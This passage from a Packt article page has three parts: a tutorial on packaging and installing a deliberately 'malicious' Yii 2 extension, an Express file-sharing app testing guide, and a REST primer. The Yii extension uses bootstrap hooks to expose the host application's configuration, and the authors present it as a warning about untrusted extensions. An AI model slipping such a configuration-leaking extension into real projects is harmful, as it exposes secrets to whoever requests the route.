"malicious/app-info","version": "1.0.0","description": "Example extension which reveals importantinformation about the application","keywords": ["yii2", "application-info", "example-extension"],"license": "CC-0", Technically, we must provide only name. Even version can be omitted if our package meets two prerequisites: It is distributed from some version control system repository, such as the Git repository It has tags in this repository, correctly identifying the versions in the commit history And we do not want to bother with it right now. Next, we need to depend on the Yii 2 framework just in case. Normally, users will install the extension after the framework is already in place, but in the case of the extension already being listed in the require section of composer.json, among other things, we cannot be sure about the exact ordering of the require statements, so it's better (and easier) to just declare dependency explicitly as follows: "require": {"yiisoft/yii2": "*"}, Then, we must provide the type as follows: "type": "yii2-extension", After this, for the Yii 2 extension installer, we have to provide two additional blocks; autoload will be used to correctly fill the alias section of the extension configuration. Have a look at the following code: "autoload": {"psr-4": {"malicious\": ""}}, What we basically mean is that our classes are laid out according to PSR-4 rules in such a way that the classes in the malicious namespace are placed right inside the root folder. The second block is extra, in which we tell the installer that we want to declare a bootstrap section for the extension configuration: "extra": {"bootstrap": "malicious\Bootstrap"}, Our manifest file is complete now. Commit everything to the version control system: $ git commit -a -m "Added the Composer manifest file to repo" Now, we'll add the tag at last, corresponding to the version we declared as follows: $ git tag 1.0.0 We already mentioned earlier the purpose for which we're doing this. All that's left is to tell the composer from where to fetch the extension contents. Configuring the repositories We need to configure some kind of repository for the extension now so that it is installable. The easiest way is to use the Packagist service, available at https://packagist.org/, which has seamless integration with composer. It has the following pro and con: Pro: You don't need to declare anything additional in the composer.json file of the application you want to attach the extension to Con: You must have a public VCS repository (either Git, SVN, or Mercurial) where your extension is published In our case, where we are just in fact learning about how to install things using composer, we certainly do not want to make our extension public. Do not use Packagist for the extension example we are building in this article. Let's recall our goal. Our goal is to be able to install our extension by calling the following command at the root of the code base of some Yii 2 application: $ php composer.phar require "malicious/app-info:*" After that, we should see something like the following screenshot after requesting the /app-info/configuration route: This corresponds to the following structure (the screenshot is from the http://jsonviewer.stack.hu/ web service): Put the extension to some public repository, for example, GitHub, and register a package at Packagist. This command will then work without any preparation in the composer.json manifest file of the target application. But in our case, we will not make this extension public, and so we have two options left for us. The first option, which is perfectly suited to our learning cause, is to use the archived package directly. For this, you have to add the repositories section to composer.json in the code base of the application you want to add the extension to: "repositories": [// definitions of repositories for the packages required by thisapplication] To specify the repository for the package that should be installed from the ZIP archive, you have to grab the entire contents of the composer.json manifest file of this package (in our case, our malicious/app-info extension) and put them as an element of the repositories section, verbatim. This is the most complex way to set up the composer package requirement, but this way, you can depend on absolutely any folder with files (packaged into an archive). Of course, the contents of composer.json of the extension do not specify the actual location of the extension's files. You have to add this to repositories manually. In the end, you should have the following additional section inside the composer.json manifest file of the target application: "repositories": [{"type": "package","package": {// … skipping whatever were copied verbatim from the composer.jsonof extension..."dist": {"url": "/home/vagrant/malicious.zip", // example filelocation"type": "zip"}}}] This way, we specify the location of the package in the filesystem of the same machine and tell the composer that this package is a ZIP archive. Now, you should just zip the contents of the yii2-malicious folder we have created for the extension, put them somewhere at the target machine, and provide the correct URL. Please note that it's necessary to archive only the contents of the extension and not the folder itself. After this, you run composer on the machine that really has this URL accessible (you can use http:// type of URLs, of course, too), and then you get the following response from composer: To check that Yii 2 really installed the extension, you can open the file vendor/yiisoft/extensions.php and check whether it contains the following block now: 'malicious/app-info' =>array ('name' => 'malicious/app-info','version' => '1.0.0.0','alias' =>array ('@malicious' => $vendorDir . '/malicious/app-info',),'bootstrap' => 'malicious\Bootstrap',), (The indentation was preserved as is from the actual file.) If this block is indeed there, then all you need to do is open the /app-info/configuration route and see whether it reports JSON to you. It should. The pros and cons of the file-based installation are as follows: Pros Cons You can specify any file as long as it is reachable by some URL. The ZIP archive management capabilities exist on virtually any kind of platform today. There is too much work in the composer.json manifest file of the target application. The requirement to copy the entire manifest to the repositories section is overwhelming and leads to code duplication. You don't need to set up any version control system repository. It's of dubious benefit though. The manifest from the extension package will not be processed at all. This means that you cannot just strip the entry in repositories, leaving only the dist and name sections there, because the Yii 2 installer will not be able to get to the autoloader and extra sections. The last method is to use the local version control system repository. We already have everything committed to the Git repository, and we have the correct tag placed here, corresponding to the version we declared in the manifest. This is everything we need to prepare inside the extension itself. Now, we need to modify the target application's manifest to add the repositories section in the same way we did previously, but this time we will introduce a lot less code there: "repositories": [{"type": "git","url": "/home/vagrant/yii2-malicious/" // put your own URLhere}] All that's needed from you is to specify the correct URL to the Git repository of the extension we were preparing at the beginning of this article. After you specify this repository in the target application's composer manifest, you can just issue the desired command: $ php composer.phar require "malicious/app-info:1.0.0" Everything will be installed as usual. Confirm the successful installation again by having a look at the contents of vendor/yiisoft/extensions.php and by accessing the /app-info/configuration route in the application. The pros and con of the repository-based installation are as follows: Pro: Relatively little code to write in the application's manifest. Pro: You don't need to really publish your extension (or the package in general). In some settings, it's really useful, for closed-source software, for example. Con: You still have to meddle with the manifest of the application itself, which can be out of your control and in this case, you'll have to guide your users about how to install your extension, which is not good for PR. In short, the following pieces inside the composer.json manifest turn the arbitrary composer package into the Yii 2 extension: First, we tell composer to use the special Yii 2 installer for packages as follows: "type": "yii2-extension" Then, we tell the Yii 2 extension installer where the bootstrap for the extension (if any) is as follows: "extra": {"bootstrap": "<Fully qualified name>"} Next, we tell the Yii 2 extension installer how to prepare aliases for your extension so that classes can be autoloaded as follows: "autoloader": {"psr-4": { "namespace": "<folder path>"}} Finally, we add the explicit requirement of the Yii 2 framework itself in the following code, so we'll be sure that the Yii 2 extension installer will be installed at all: "require": {"yiisoft/yii2": "*"} Everything else is the details of the installation of any other composer package, which you can read in the official composer documentation. Summary In this article, we looked at how Yii 2 implements its extensions so that they're easily installable by a single composer invocation and can be automatically attached to the application afterwards. We learned that this required some level of integration between these two systems, Yii 2 and composer, and in turn this requires some additional preparation from you as a developer of the extension. We used a really silly, even a bit dangerous, example for extension. It was for three reasons: The extension was fun to make (we hope) We showed that using bootstrap mechanics, we can basically automatically wire up the pieces of the extension to the target application without any need for elaborate manual installation instructions We showed the potential danger in installing random extensions from the Web, as an extension can run absolutely arbitrary code right at the application initialization and more than that, at each request made to the application We have discussed three methods of distribution of composer packages, which also apply to the Yii 2 extensions. The general rule of thumb is this: if you want your extension to be publicly available, just use the Packagist service. In any other case, use the local repositories, as you can use both local filesystem paths and web URLs. We looked at the option to attach the extension completely manually, not using the composer installation at all. Resources for Article: Further resources on this subject: Yii: Adding Users and User Management to Your Site [Article] Meet Yii [Article] Yii 1.1: Using Zii Components [Article]
Read more
  • 0
  • 0
  • 5021

article-image-improving-code-quality
Packt
22 Sep 2014
18 min read
Save for later

Improving Code Quality

Packt
22 Sep 2014
18 min read
In this article by Alexandru Vlăduţu, author of Mastering Web Application Development with Express, we are going to see how to test Express applications and how to improve the code quality of our code by leveraging existing NPM modules. (For more resources related to this topic, see here.) Creating and testing an Express file-sharing application Now, it's time to see how to develop and test an Express application with what we have learned previously. We will create a file-sharing application that allows users to upload files and password-protect them if they choose to. After uploading the files to the server, we will create a unique ID for that file, store the metadata along with the content (as a separate JSON file), and redirect the user to the file's information page. When trying to access a password-protected file, an HTTP basic authentication pop up will appear, and the user will have to only enter the password (no username in this case). The package.json file, so far, will contain the following code: { "name": "file-uploading-service", "version": "0.0.1", "private": true, "scripts": { "start": "node ./bin/www" }, "dependencies": { "express": "~4.2.0", "static-favicon": "~1.0.0", "morgan": "~1.0.0", "cookie-parser": "~1.0.1", "body-parser": "~1.0.0", "debug": "~0.7.4", "ejs": "~0.8.5", "connect-multiparty": "~1.0.5", "cuid": "~1.2.4", "bcrypt": "~0.7.8", "basic-auth-connect": "~1.0.0", "errto": "~0.2.1", "custom-err": "0.0.2", "lodash": "~2.4.1", "csurf": "~1.2.2", "cookie-session": "~1.0.2", "secure-filters": "~1.0.5", "supertest": "~0.13.0", "async": "~0.9.0" }, "devDependencies": { } } When bootstrapping an Express application using the CLI, a /bin/www file will be automatically created for you. The following is the version we have adopted to extract the name of the application from the package.json file. This way, in case we decide to change it we won't have to alter our debugging code because it will automatically adapt to the new name, as shown in the following code: #!/usr/bin/env node var pkg = require('../package.json'); var debug = require('debug')(pkg.name + ':main'); var app = require('../app'); app.set('port', process.env.PORT || 3000); var server = app.listen(app.get('port'), function() { debug('Express server listening on port ' + server.address().port); }); The application configurations will be stored inside config.json: { "filesDir": "files", "maxSize": 5 } The properties listed in the preceding code refer to the files folder (where the files will be updated), which is relative to the root and the maximum allowed file size. The main file of the application is named app.js and lives in the root. We need the connect-multiparty module to support file uploads, and the csurf and cookie-session modules for CSRF protection. The rest of the dependencies are standard and we have used them before. The full code for the app.js file is as follows: var express = require('express'); var path = require('path'); var favicon = require('static-favicon'); var logger = require('morgan'); var cookieParser = require('cookie-parser'); var session = require('cookie-session'); var bodyParser = require('body-parser'); var multiparty = require('connect-multiparty'); var Err = require('custom-err'); var csrf = require('csurf'); var ejs = require('secure-filters').configure(require('ejs')); var csrfHelper = require('./lib/middleware/csrf-helper'); var homeRouter = require('./routes/index'); var filesRouter = require('./routes/files'); var config = require('./config.json'); var app = express(); var ENV = app.get('env'); // view engine setup app.engine('html', ejs.renderFile); app.set('views', path.join(__dirname, 'views')); app.set('view engine', 'html'); app.use(favicon()); app.use(bodyParser.json()); app.use(bodyParser.urlencoded()); // Limit uploads to X Mb app.use(multiparty({ maxFilesSize: 1024 * 1024 * config.maxSize })); app.use(cookieParser()); app.use(session({ keys: ['rQo2#0s!qkE', 'Q.ZpeR49@9!szAe'] })); app.use(csrf()); // add CSRF helper app.use(csrfHelper); app.use('/', homeRouter); app.use('/files', filesRouter); app.use(express.static(path.join(__dirname, 'public'))); /// catch 404 and forward to error handler app.use(function(req, res, next) { next(Err('Not Found', { status: 404 })); }); /// error handlers // development error handler // will print stacktrace if (ENV === 'development') { app.use(function(err, req, res, next) { res.status(err.status || 500); res.render('error', { message: err.message, error: err }); }); } // production error handler // no stacktraces leaked to user app.use(function(err, req, res, next) { res.status(err.status || 500); res.render('error', { message: err.message, error: {} }); }); module.exports = app; Instead of directly binding the application to a port, we are exporting it, which makes our lives easier when testing with supertest. We won't need to care about things such as the default port availability or specifying a different port environment variable when testing. To avoid having to create the whole input when including the CSRF token, we have created a helper for that inside lib/middleware/csrf-helper.js: module.exports = function(req, res, next) { res.locals.csrf = function() { return "<input type='hidden' name='_csrf' value='" + req.csrfToken() + "' />"; } next(); }; For the password–protection functionality, we will use the bcrypt module and create a separate file inside lib/hash.js for the hash generation and password–compare functionality: var bcrypt = require('bcrypt'); var errTo = require('errto'); var Hash = {}; Hash.generate = function(password, cb) { bcrypt.genSalt(10, errTo(cb, function(salt) { bcrypt.hash(password, salt, errTo(cb, function(hash) { cb(null, hash); })); })); }; Hash.compare = function(password, hash, cb) { bcrypt.compare(password, hash, cb); }; module.exports = Hash; The biggest file of our application will be the file model, because that's where most of the functionality will reside. We will use the cuid() module to create unique IDs for files, and the native fs module to interact with the filesystem. The following code snippet contains the most important methods for models/file.js: function File(options, id) { this.id = id || cuid(); this.meta = _.pick(options, ['name', 'type', 'size', 'hash', 'uploadedAt']); this.meta.uploadedAt = this.meta.uploadedAt || new Date(); }; File.prototype.save = function(path, password, cb) { var _this = this; this.move(path, errTo(cb, function() { if (!password) { return _this.saveMeta(cb); } hash.generate(password, errTo(cb, function(hashedPassword) { _this.meta.hash = hashedPassword; _this.saveMeta(cb); })); })); }; File.prototype.move = function(path, cb) { fs.rename(path, this.path, cb); }; For the full source code of the file, browse the code bundle. Next, we will create the routes for the file (routes/files.js), which will export an Express router. As mentioned before, the authentication mechanism for password-protected files will be the basic HTTP one, so we will need the basic-auth-connect module. At the beginning of the file, we will include the dependencies and create the router: var express = require('express'); var basicAuth = require('basic-auth-connect'); var errTo = require('errto'); var pkg = require('../package.json'); var File = require('../models/file'); var debug = require('debug')(pkg.name + ':filesRoute'); var router = express.Router(); We will have to create two routes that will include the id parameter in the URL, one for displaying the file information and another one for downloading the file. In both of these cases, we will need to check if the file exists and require user authentication in case it's password-protected. This is an ideal use case for the router.param() function because these actions will be performed each time there is an id parameter in the URL. The code is as follows: router.param('id', function(req, res, next, id) { File.find(id, errTo(next, function(file) { debug('file', file); // populate req.file, will need it later req.file = file; if (file.isPasswordProtected()) { // Password – protected file, check for password using HTTP basic auth basicAuth(function(user, pwd, fn) { if (!pwd) { return fn(); } // ignore user file.authenticate(pwd, errTo(next, function(match) { if (match) { return fn(null, file.id); } fn(); })); })(req, res, next); } else { // Not password – protected, proceed normally next(); } })); }); The rest of the routes are fairly straightforward, using response.download() to send the file to the client, or using response.redirect() after uploading the file: router.get('/', function(req, res, next) { res.render('files/new', { title: 'Upload file' }); }); router.get('/:id.html', function(req, res, next) { res.render('files/show', { id: req.params.id, meta: req.file.meta, isPasswordProtected: req.file.isPasswordProtected(), hash: hash, title: 'Download file ' + req.file.meta.name }); }); router.get('/download/:id', function(req, res, next) { res.download(req.file.path, req.file.meta.name); }); router.post('/', function(req, res, next) { var tempFile = req.files.file; if (!tempFile.size) { return res.redirect('/files'); } var file = new File(tempFile); file.save(tempFile.path, req.body.password, errTo(next, function() { res.redirect('/files/' + file.id + '.html'); })); }); module.exports = router; The view for uploading a file contains a multipart form with a CSRF token inside (views/files/new.html): <%- include ../layout/header.html %> <form action="/files" method="POST" enctype="multipart/form-data"> <div class="form-group"> <label>Choose file:</label> <input type="file" name="file" /> </div> <div class="form-group"> <label>Password protect (leave blank otherwise):</label> <input type="password" name="password" /> </div> <div class="form-group"> <%- csrf() %> <input type="submit" /> </div> </form> <%- include ../layout/footer.html %> To display the file's details, we will create another view (views/files/show.html). Besides showing the basic file information, we will display a special message in case the file is password-protected, so that the client is notified that a password should also be shared along with the link: <%- include ../layout/header.html %> <p> <table> <tr> <th>Name</th> <td><%= meta.name %></td> </tr> <th>Type</th> <td><%= meta.type %></td> </tr> <th>Size</th> <td><%= meta.size %> bytes</td> </tr> <th>Uploaded at</th> <td><%= meta.uploadedAt %></td> </tr> </table> </p> <p> <a href="/files/download/<%- id %>">Download file</a> | <a href="/files">Upload new file</a> </p> <p> To share this file with your friends use the <a href="/files/<%- id %>">current link</a>. <% if (isPasswordProtected) { %> <br /> Don't forget to tell them the file password as well! <% } %> </p> <%- include ../layout/footer.html %> Running the application To run the application, we need to install the dependencies and run the start script: $ npm i $ npm start The default port for the application is 3000, so if we visit http://localhost:3000/files, we should see the following page: After uploading the file, we should be redirected to the file's page, where its details will be displayed: Unit tests Unit testing allows us to test individual parts of our code in isolation and verify their correctness. By making our tests focused on these small components, we decrease the complexity of the setup, and most likely, our tests should execute faster. Using the following command, we'll install a few modules to help us in our quest: $ npm i mocha should sinon––save-dev We are going to write unit tests for our file model, but there's nothing stopping us from doing the same thing for our routes or other files from /lib. The dependencies will be listed at the top of the file (test/unit/file-model.js): var should = require('should'); var path = require('path'); var config = require('../../config.json'); var sinon = require('sinon'); We will also need to require the native fs module and the hash module, because these modules will be stubbed later on. Apart from these, we will create an empty callback function and reuse it, as shown in the following code: // will be stubbing methods on these modules later on var fs = require('fs'); var hash = require('../../lib/hash'); var noop = function() {}; The tests for the instance methods will be created first: describe('models', function() { describe('File', function() { var File = require('../../models/file'); it('should have default properties', function() { var file = new File(); file.id.should.be.a.String; file.meta.uploadedAt.should.be.a.Date; }); it('should return the path based on the root and the file id', function() { var file = new File({}, '1'); file.path.should.eql(File.dir + '/1'); }); it('should move a file', function() { var stub = sinon.stub(fs, 'rename'); var file = new File({}, '1'); file.move('/from/path', noop); stub.calledOnce.should.be.true; stub.calledWith('/from/path', File.dir + '/1', noop).should.be.true; stub.restore(); }); it('should save the metadata', function() { var stub = sinon.stub(fs, 'writeFile'); var file = new File({}, '1'); file.meta = { a: 1, b: 2 }; file.saveMeta(noop); stub.calledOnce.should.be.true; stub.calledWith(File.dir + '/1.json', JSON.stringify(file.meta), noop).should.be.true; stub.restore(); }); it('should check if file is password protected', function() { var file = new File({}, '1'); file.meta.hash = 'y'; file.isPasswordProtected().should.be.true; file.meta.hash = null; file.isPasswordProtected().should.be.false; }); it('should allow access if matched file password', function() { var stub = sinon.stub(hash, 'compare'); var file = new File({}, '1'); file.meta.hash = 'hashedPwd'; file.authenticate('password', noop); stub.calledOnce.should.be.true; stub.calledWith('password', 'hashedPwd', noop).should.be.true; stub.restore(); }); We are stubbing the functionalities of the fs and hash modules because we want to test our code in isolation. Once we are done with the tests, we restore the original functionality of the methods. Now that we're done testing the instance methods, we will go on to test the static ones (assigned directly onto the File object): describe('.dir', function() { it('should return the root of the files folder', function() { path.resolve(__dirname + '/../../' + config.filesDir).should.eql(File.dir); }); }); describe('.exists', function() { var stub; beforeEach(function() { stub = sinon.stub(fs, 'exists'); }); afterEach(function() { stub.restore(); }); it('should callback with an error when the file does not exist', function(done) { File.exists('unknown', function(err) { err.should.be.an.instanceOf(Error).and.have.property('status', 404); done(); }); // call the function passed as argument[1] with the parameter `false` stub.callArgWith(1, false); }); it('should callback with no arguments when the file exists', function(done) { File.exists('existing-file', function(err) { (typeof err === 'undefined').should.be.true; done(); }); // call the function passed as argument[1] with the parameter `true` stub.callArgWith(1, true); }); }); }); }); To stub asynchronous functions and execute their callback, we use the stub.callArgWith() function provided by sinon, which executes the callback provided by the argument with the index <<number>> of the stub with the subsequent arguments. For more information, check out the official documentation at http://sinonjs.org/docs/#stubs. When running tests, Node developers expect the npm test command to be the command that triggers the test suite, so we need to add that script to our package.json file. However, since we are going to have different tests to be run, it would be even better to add a unit-tests script and make npm test run that for now. The scripts property should look like the following code: "scripts": { "start": "node ./bin/www", "unit-tests": "mocha --reporter=spec test/unit", "test": "npm run unit-tests" }, Now, if we run the tests, we should see the following output in the terminal: Functional tests So far, we have tested each method to check whether it works fine on its own, but now, it's time to check whether our application works according to the specifications when wiring all the things together. Besides the existing modules, we will need to install and use the following ones: supertest: This is used to test the routes in an expressive manner cheerio: This is used to extract the CSRF token out of the form and pass it along when uploading the file rimraf: This is used to clean up our files folder once we're done with the testing We will create a new file called test/functional/files-routes.js for the functional tests. As usual, we will list our dependencies first: var fs = require('fs'); var request = require('supertest'); var should = require('should'); var async = require('async'); var cheerio = require('cheerio'); var rimraf = require('rimraf'); var app = require('../../app'); There will be a couple of scenarios to test when uploading a file, such as: Checking whether a file that is uploaded without a password can be publicly accessible Checking that a password-protected file can only be accessed with the correct password We will create a function called uploadFile that we can reuse across different tests. This function will use the same supertest agent when making requests so it can persist the cookies, and will also take care of extracting and sending the CSRF token back to the server when making the post request. In case a password argument is provided, it will send that along with the file. The function will assert that the status code for the upload page is 200 and that the user is redirected to the file page after the upload. The full code of the function is listed as follows: function uploadFile(agent, password, done) { agent .get('/files') .expect(200) .end(function(err, res) { (err == null).should.be.true; var $ = cheerio.load(res.text); var csrfToken = $('form input[name=_csrf]').val(); csrfToken.should.not.be.empty; var req = agent .post('/files') .field('_csrf', csrfToken) .attach('file', __filename); if (password) { req = req.field('password', password); } req .expect(302) .expect('Location', /files/(.*).html/) .end(function(err, res) { (err == null).should.be.true; var fileUid = res.headers['location'].match(/files/(.*).html/)[1]; done(null, fileUid); }); }); } Note that we will use rimraf in an after function to clean up the files folder, but it would be best to have a separate path for uploading files while testing (other than the one used for development and production): describe('Files-Routes', function(done) { after(function() { var filesDir = __dirname + '/../../files'; rimraf.sync(filesDir); fs.mkdirSync(filesDir); When testing the file uploads, we want to make sure that without providing the correct password, access will not be granted to the file pages: describe("Uploading a file", function() { it("should upload a file without password protecting it", function(done) { var agent = request.agent(app); uploadFile(agent, null, done); }); it("should upload a file and password protect it", function(done) { var agent = request.agent(app); var pwd = 'sample-password'; uploadFile(agent, pwd, function(err, filename) { async.parallel([ function getWithoutPwd(next) { agent .get('/files/' + filename + '.html') .expect(401) .end(function(err, res) { (err == null).should.be.true; next(); }); }, function getWithPwd(next) { agent .get('/files/' + filename + '.html') .set('Authorization', 'Basic ' + new Buffer(':' + pwd).toString('base64')) .expect(200) .end(function(err, res) { (err == null).should.be.true; next(); }); } ], function(err) { (err == null).should.be.true; done(); }); }); }); }); }); It's time to do the same thing we did for the unit tests: make a script so we can run them with npm by using npm run functional-tests. At the same time, we should update the npm test script to include both our unit tests and our functional tests: "scripts": { "start": "node ./bin/www", "unit-tests": "mocha --reporter=spec test/unit", "functional-tests": "mocha --reporter=spec --timeout=10000 --slow=2000 test/functional", "test": "npm run unit-tests && npm run functional-tests" } If we run the tests, we should see the following output: Running tests before committing in Git It's a good practice to run the test suite before committing to git and only allowing the commit to pass if the tests have been executed successfully. The same applies for other version control systems. To achieve this, we should add the .git/hooks/pre-commit file, which should take care of running the tests and exiting with an error in case they failed. Luckily, this is a repetitive task (which can be applied to all Node applications), so there is an NPM module that creates this hook file for us. All we need to do is install the pre-commit module (https://www.npmjs.org/package/pre-commit) as a development dependency using the following command: $ npm i pre-commit ––save-dev This should automatically create the pre-commit hook file so that all the tests are run before committing (using the npm test command). The pre-commit module also supports running custom scripts specified in the package.json file. For more details on how to achieve that, read the module documentation at https://www.npmjs.org/package/pre-commit. Summary In this article, we have learned about writing tests for Express applications and in the process, explored a variety of helpful modules. Resources for Article: Further resources on this subject: Web Services Testing and soapUI [article] ExtGWT Rich Internet Application: Crafting UI Real Estate [article] Rendering web pages to PDF using Railo Open Source [article]
Read more
  • 0
  • 0
  • 1187
Banner background image

Packt
17 Sep 2014
12 min read
Save for later

What is REST?

Packt
17 Sep 2014
12 min read
This article by Bhakti Mehta, the author of Restful Java Patterns and Best Practices, starts with the basic concepts of REST, how to design RESTful services, and best practices around designing REST resources. It also covers the architectural aspects of REST. (For more resources related to this topic, see here.) Where REST has come from The confluence of social networking, cloud computing, and era of mobile applications creates a generation of emerging technologies that allow different networked devices to communicate with each other over the Internet. In the past, there were traditional and proprietary approaches for building solutions encompassing different devices and components communicating with each other over a non-reliable network or through the Internet. Some of these approaches such as RPC, CORBA, and SOAP-based web services, which evolved as different implementations for Service Oriented Architecture (SOA) required a tighter coupling between components along with greater complexities in integration. As the technology landscape evolves, today’s applications are built on the notion of producing and consuming APIs instead of using web frameworks that invoke services and produce web pages. This requirement enforces the need for easier exchange of information between distributed services along with predictable, robust, well-defined interfaces. API based architecture enables agile development, easier adoption and prevalence, scale and integration with applications within and outside the enterprise HTTP 1.1 is defined in RFC 2616, and is ubiquitously used as the standard protocol for distributed, collaborative and hypermedia information systems. Representational State Transfer (REST) is inspired by HTTP and can be used wherever HTTP is used. The widespread adoption of REST and JSON opens up the possibilities of applications incorporating and leveraging functionality from other applications as needed. Popularity of REST is mainly because it enables building lightweight, simple, cost-effective modular interfaces, which can be consumed by a variety of clients. This article covers the following topics Introduction to REST Safety and Idempotence HTTP verbs and REST Best practices when designing RESTful services REST architectural components Introduction to REST REST is an architectural style that conforms to the Web Standards like using HTTP verbs and URIs. It is bound by the following principles. All resources are identified by the URIs. All resources can have multiple representations All resources can be accessed/modified/created/deleted by standard HTTP methods. There is no state on the server. REST is extensible due to the use of URIs for identifying resources. For example, a URI to represent a collection of book resources could look like this: http://foo.api.com/v1/library/books A URI to represent a single book identified by its ISBN could be as follows: http://foo.api.com/v1/library/books/isbn/12345678 A URI to represent a coffee order resource could be as follows: http://bar.api.com/v1/coffees/orders/1234 A user in a system can be represented like this: http://some.api.com/v1/user A URI to represent all the book orders for a user could be: http://bar.api.com/v1/user/5034/book/orders All the preceding samples show a clear readable pattern, which can be interpreted by the client. All these resources could have multiple representations. These resource examples shown here can be represented by JSON or XML and can be manipulated by HTTP methods: GET, PUT, POST, and DELETE. The following table summarizes HTTP Methods and descriptions for the actions taken on the resource with a simple example of a collection of books in a library. HTTP method Resource URI Description GET /library/books Gets a list of books GET /library/books/isbn/12345678 Gets a book identified by ISBN “12345678” POST /library/books Creates a new book order DELETE /library/books/isbn/12345678 Deletes a book identified by ISBN “12345678” PUT /library/books/isbn/12345678 Updates a specific book identified by ISBN “12345678’ PATCH /library/books/isbn/12345678 Can be used to do partial update for a book identified by ISBN “12345678” REST and statelessness REST is bound by the principle of statelessness. Each request from the client to the server must have all the details to understand the request. This helps to improve visibility, reliability and scalability for requests. Visibility is improved, as the system monitoring the requests does not have to look beyond one request to get details. Reliability is improved, as there is no check-pointing/resuming to be done in case of partial failures. Scalability is improved, as the number of requests that can be processed is increases as the server is not responsible for storing any state. Roy Fielding’s dissertation on the REST architectural style provides details on the statelessness of REST, check http://www.ics.uci.edu/~fielding/pubs/dissertation/rest_arch_style.htm With this initial introduction to basics of REST, we shall cover the different maturity levels and how REST falls in it in the following section. Richardson Maturity Model Richardson maturity model is a model, which is developed by Leonard Richardson. It talks about the basics of REST in terms of resources, verbs and hypermedia controls. The starting point for the maturity model is to use HTTP layer as the transport. Level 0 – Remote Procedure Invocation This level contains SOAP or XML-RPC sending data as POX (Plain Old XML). Only POST methods are used. This is the most primitive way of building SOA applications with a single method POST and using XML to communicate between services. Level 1 – REST resources This uses POST methods and instead of using a function and passing arguments uses the REST URIs. So it still uses only one HTTP method. It is better than Level 0 that it breaks a complex functionality into multiple resources with one method. Level 2 – more HTTP verbs This level uses other HTTP verbs like GET, HEAD, DELETE, PUT along with POST methods. Level 2 is the real use case of REST, which advocates using different verbs based on the HTTP request methods and the system can have multiple resources. Level 3 – HATEOAS Hypermedia as the Engine of Application State (HATEOAS) is the most mature level of Richardson’s model. The responses to the client requests, contains hypermedia controls, which can help the client decide what the next action they can take. Level 3 encourages easy discoverability and makes it easy for the responses to be self- explanatory. Safety and Idempotence This section discusses in details about what are safe and idempotent methods. Safe methods Safe methods are methods that do not change the state on the server. GET and HEAD are safe methods. For example GET /v1/coffees/orders/1234 is a safe method. Safe methods can be cached. PUT method is not safe as it will create or modify a resource on the server. POST method is not safe for the same reasons. DELETE method is not safe as it deletes a resource on the server. Idempotent methods An idempotent method is a method that will produce the same results irrespective of how many times it is called. For example GET method is idempotent, as multiple calls to the GET resource will always return the same response. PUT method is idempotent as calling PUT method multiple times will update the same resource and not change the outcome. POST is not idempotent and calling POST method multiple times can have different results and will result in creating new resources. DELETE is idempotent because once the resource is deleted it is gone and calling the method multiple times will not change the outcome. HTTP verbs and REST HTTP verbs inform the server what to do with the data sent as part of the URL GET GET is the simplest verb of HTTP, which enables to get access to a resource. Whenever the client clicks a URL in the browser it sends a GET request to the address specified by the URL. GET is safe and idempotent. GET requests are cached. Query parameters can be used in GET requests. For example a simple GET request is as follows: curl http://api.foo.com/v1/user/12345 POST POST is used to create a resource. POST requests are neither idempotent nor safe. Multiple invocations of the POST requests can create multiple resources. POST requests should invalidate a cache entry if exists. Query parameters with POST requests are not encouraged For example a POST request to create a user can be curl –X POST -d’{“name”:”John Doe”,“username”:”jdoe”, “phone”:”412-344-5644”} http://api.foo.com/v1/user PUT PUT is used to update a resource. PUT is idempotent but not safe. Multiple invocations of PUT requests should produce the same results by updating the resource. PUT requests should invalidate the cache entry if exists. For example a PUT request to update a user can be curl –X PUT -d’{ “phone”:”413-344-5644”} http://api.foo.com/v1/user DELETE DELETE is used to delete a resource. DELETE is idempotent but not safe. DELETE is idempotent because based on the RFC 2616 "the side effects of N > 0 requests is the same as for a single request". This means once the resource is deleted calling DELETE multiple times will get the same response. For example, a request to delete a user is as follows: curl –X DELETE http://foo.api.com/v1/user/1234 HEAD HEAD is similar like GET request. The difference is that only HTTP headers are returned and no content is returned. HEAD is idempotent and safe. For example, a request to send HEAD request with curl is as follows: curl –X HEAD http://foo.api.com/v1/user It can be useful to send a HEAD request to see if the resource has changed before trying to get a large representation using a GET request. PUT vs POST According to RFC the difference between PUT and POST is in the Request URI. The URI identified by POST defines the entity that will handle the POST request. The URI in the PUT request includes the entity in the request. So POST /v1/coffees/orders means to create a new resource and return an identifier to describe the resource In contrast PUT /v1/coffees/orders/1234 means to update a resource identified by “1234” if it does not exist else create a new order and use the URI orders/1234 to identify it. Best practices when designing resources This section highlights some of the best practices when designing RESTful resources: The API developer should use nouns to understand and navigate through resources and verbs with the HTTP method. For example the URI /user/1234/books is better than /user/1234/getBook. Use associations in the URIs to identify sub resources. For example to get the authors for book 5678 for user 1234 use the following URI /user/1234/books/5678/authors. For specific variations use query parameters. For example to get all the books with 10 reviews /user/1234/books?reviews_counts=10. Allow partial responses as part of query parameters if possible. An example of this case is to get only the name and age of a user, the client can specify, ?fields as a query parameter and specify the list of fields which should be sent by the server in the response using the URI /users/1234?fields=name,age. Have defaults for the output format for the response incase the client does not specify which format it is interested in. Most API developers choose to send json as the default response mime type. Have camelCase or use _ for attribute names. Support a standard API for count for example users/1234/books/count in case of collections so the client can get the idea of how many objects can be expected in the response. This will also help the client, with pagination queries. Support a pretty printing option users/1234?pretty_print. Also it is a good practice to not cache queries with pretty print query parameter. Avoid chattiness by being as verbose as possible in the response. This is because if the server does not provide enough details in the response the client needs to make more calls to get additional details. That is a waste of network resources as well as counts against the client’s rate limits. REST architecture components This section will cover the various components that must be considered when building RESTful APIs As seen in the preceding screenshot, REST services can be consumed from a variety of clients and applications running on different platforms and devices like mobile devices, web browsers etc. These requests are sent through a proxy server. The HTTP requests will be sent to the resources and based on the various CRUD operations the right HTTP method will be selected. On the response side there can be Pagination, to ensure the server sends a subset of results. Also the server can do Asynchronous processing thus improving responsiveness and scale. There can be links in the response, which deals with HATEOAS. Here is a summary of the various REST architectural components: HTTP requests use REST API with HTTP verbs for the uniform interface constraint Content negotiation allows selecting a representation for a response when there are multiple representations available. Logging helps provide traceability to analyze and debug issues Exception handling allows sending application specific exceptions with HTTP codes Authentication and authorization with OAuth2.0 gives access control to other applications, to take actions without the user having to send their credentials Validation provides support to send back detailed messages with error codes to the client as well as validations for the inputs received in the request. Rate limiting ensures the server is not burdened with too many requests from single client Caching helps to improve application responsiveness. Asynchronous processing enables the server to asynchronously send back the responses to the client. Micro services which comprises breaking up a monolithic service into fine grained services HATEOAS to improve usability, understandability and navigability by returning a list of links in the response Pagination to allow clients to 